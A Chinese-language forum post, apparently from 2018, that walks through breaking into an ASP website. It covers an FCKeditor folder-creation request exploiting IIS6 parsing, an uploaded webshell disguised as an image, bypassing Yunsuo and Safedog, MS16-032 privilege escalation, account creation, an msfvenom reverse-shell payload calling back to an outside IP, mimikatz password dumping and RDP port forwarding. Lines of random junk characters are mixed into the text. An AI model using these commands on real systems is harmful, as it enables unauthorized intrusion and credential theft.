|
6 T6 j" B* ~2 M" r* U* T! r ! J, J9 A+ U6 n4 n2 G. V3 y7 Q! f
" v$ v8 m1 j" [5 b $ Z4 e+ y8 B; [& p/ h* P1 J- m
| ; B7 T: a1 i2 I) t9 Y; O( K
: l" L# i0 T( b3 A
) C$ `5 h& O8 o C8 [1 Z一、 利用getwebshell篇
' n3 G$ C3 ~* D- C* ~+ w. [6 {& a- n
: E1 C" S1 I: E' Z) q! y+ k首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ f7 W3 ~5 I" c$ c
0 z! L: p( j! a7 h
8 w( i, I/ f" }+ D
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
9 U$ j0 [( O0 r* Q' W B4 s
$ @7 \, \0 D3 z4 N8 L
下面我们构造一个asp目录,如: - t$ V5 V3 s/ b* w. B5 z! I( {" F! T
$ f S3 T/ B |" ?8 r
9 \7 c* P$ V6 @. O http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 " Q- g5 {1 I& y1 F
% j5 X) p" d3 D* k" A! Q
4 w# S/ E, a, n4 L; G0 j 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
8 C9 D* q7 \" n0 x) Z0 V/ b o M! d
0 F2 M" M1 N- C3 k+ f1 W7 x0 q
一、 绕过安全狗云锁提权并且加账号
( n7 i" w+ H& F- P; k) o
9 h4 Y5 M# F; T& H; u8 B1 ^5 f+ J T
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
1 H7 Y! W% B. _+ d+ r% }2 O9 G' w
: M6 [$ ~7 x! a" m) L
如图:
+ u" r1 C2 E/ T n% c2 ?8 I' o$ r
/ I& S+ r% c) V" [- z然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
5 |' k# e5 @$ `; o, k
9 m& X$ D3 s0 Y. F* m3 |- b一、 利用metasploit
`7 H4 a3 w, ^/ L* `1 u9 i1 c$ J
, v& ]7 o# r. K$ A, l( K5 w+ o3 j9 x首先用pentestbox生成一个64位的payload如下命令
# w: S! X- z9 C
6 `( v$ u8 @) n, ?( m, }1 W
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
" ~. X0 X+ W; [2 n3 ^* t
8 I* d8 g" o( j6 `! e h; I
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
2 l* v4 x, I8 R! h. S: l6 R4 c
7 W2 d- ~3 Z- }4 [" B# x! x
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
$ U. r/ W% A4 @ i3 U- k
- t6 v& |$ r# _% {/ b下面我们来做一个监听如下命令:
9 l, n" {' A. ^' l( J! r" C1 Y
- P6 G ]* u3 E0 O' a+ {
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
# o. j6 Z1 R- f
 - z) l* e! e' v7 P5 Y5 ]! Y
7 o" j, A: P) _2 c# s | / |+ j( Q8 \- @/ a' K1 v
/ j4 |8 L/ z; `5 d* U2 b4 H$ o
8 N2 [. e/ J4 }; a) P; V 2 M, q. M$ i8 e+ _7 R3 m* m4 `
+ ^( c9 ~4 w1 j! z) D" \& j9 G. M3 i6 n4 w8 Z7 O
. i/ Q0 P' O4 @" n' O8 @/ d
0 |# v$ K/ i8 ^5 Z4 R
! [+ {: A% W, }* M# f0 |" V9 X; n * g) J; @" x1 F5 Y; }
% g! G' v$ i& N% i& q! i8 A
4 B, M, e4 G( J3 n) i8 z* v0 |3 y& u: E; `( I
. \, u" |+ a9 n
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06